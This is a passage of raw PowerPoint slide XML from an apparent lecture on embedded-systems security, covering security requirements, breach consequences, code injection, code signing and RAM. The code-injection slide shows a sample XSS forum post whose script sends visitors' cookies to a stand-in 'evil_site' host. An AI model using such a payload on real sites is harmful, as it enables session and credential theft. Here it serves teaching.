              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wifi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t Care for Physical Attacks – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It’s OK to rip the system apart and hack it (although it voids warranty…)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6148" name="Picture 2" descr="C:\Documents and Settings\aeldar\Local Settings\Temporary Internet Files\Content.IE5\797OSUTU\MCj0398531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457200"/>
            <a:ext cx="18224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666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Example: Game Console</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protect against unauthorized access over the network – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Local LAN, Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protect against software piracy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevent owner from running non-licensed game media</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevent owner from running a different operating system (i.e. Linux)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>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381000"/>
            <a:ext cx="107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50144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Requirements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1752600"/>
            <a:ext cx="8229600" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Protection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>from disclosure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>to unauthorized persons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Mechanism: encryption algorithms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Maintaining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>consistency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Mechanism: cryptographic hash functions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Assurance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>of identity of person or originator of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Mechanism: authentication services (Kerberos, NTLM)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257842380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Requirements Cont.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1828800"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Non-repudiation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Originator of communications can’t deny it later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Mechanisms: auditing services</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Legitimate users have access when they need it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Unauthorized users are kept out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Mechanisms: Authorization services – Active Directory, Windows /Unix user groups…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30102196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7700963"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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="6477000"/>
            <a:ext cx="891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sz="1800"/>
              <a:t>Peter Gutman Security Tutorial http://www.cypherpunks.to/~peter/T0_Intro.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9906737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for embedded systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security advantages compared to general purpose OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Closed system: executes “trusted” code, from the system vendor (less attack surfaces, less vulnerability)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flexible HW design, to accommodate versatile security requirements, esp. physical attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>i.e. TPM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1544060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for Embedded Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security disadvantages compared to General purpose OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Resource constraint environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need to be picky which protocols are in and which are out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Patching firmware is difficult</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Following a security breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"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209640760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Embedded systems – security breach consequences</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Embedded systems interface with the real world</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A security breach can cause physical damage to property, or sometimes injury or death</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider a security breach in a traffic light system / pace maker / ABS system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How about an ‘innocent’ home appliance, like an air conditioner?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321331289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injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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t>“Code injection” is an attack where the system runs code written by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS – cross site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Replacement of code on flash / in RAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Replace the actual flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use the FW update mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Take advantage of a vulnerability, such as in a DMA engine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2971800"/>
            <a:ext cx="7696200" cy="830263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>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Hi, I’m new in the forum.&gt; &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>='http://evil_site/evil.cgi?' +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13849179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Signing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15363" name="Picture 4" descr="C:\Documents and Settings\aeldar\Local Settings\Temporary Internet Files\Content.IE5\HH0DR67K\MPj03961210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00400"/>
            <a:ext cx="1081088"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C:\Documents and Settings\aeldar\Local Settings\Temporary Internet Files\Content.IE5\HH0DR67K\MPj0396121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4200"/>
            <a:ext cx="10810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Documents and Settings\aeldar\Local Settings\Temporary Internet Files\Content.IE5\HH0DR67K\MPj03961210000[1].jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="accent1">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>
            </a:duotone>
            <a:lum bright="14000" contrast="-5000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5396151" y="5562600"/>
            <a:ext cx="1080849" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:effectLst>
            <a:innerShdw blurRad="63500" dist="50800" dir="10800000">
              <a:prstClr val="black">
                <a:alpha val="50000"/>
              </a:prstClr>
            </a:innerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="3657600"/>
            <a:ext cx="1981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3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65560">
            <a:off x="3587750" y="3130550"/>
            <a:ext cx="1509713"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12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="5181600"/>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Executable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15369" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="6019800"/>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Digital Signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Plus 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="464820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1" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="259080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Publisher’s Private Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15372" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1524000"/>
            <a:ext cx="830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Purpose: Prevent un-authorized code from booting on the System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2375648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smtClean="0"/>
              <a:t>RAM (Random Access Memory)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323587" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Two types of RAM: Static RAM (SRAM) and Dynamic RAM (DRAM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SRAM holds content as long as power is applied, lost when power is lost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>DRAM holds content for ~.25s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>DRAM controller refreshes the memory a few times a second</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SRAM is much more expensive than DRAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>in small amounts the DRAM controller’s cost outweighs the equation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SRAM is faster than DRAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>In many cases, a small SRAM is used as a cache into DRAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
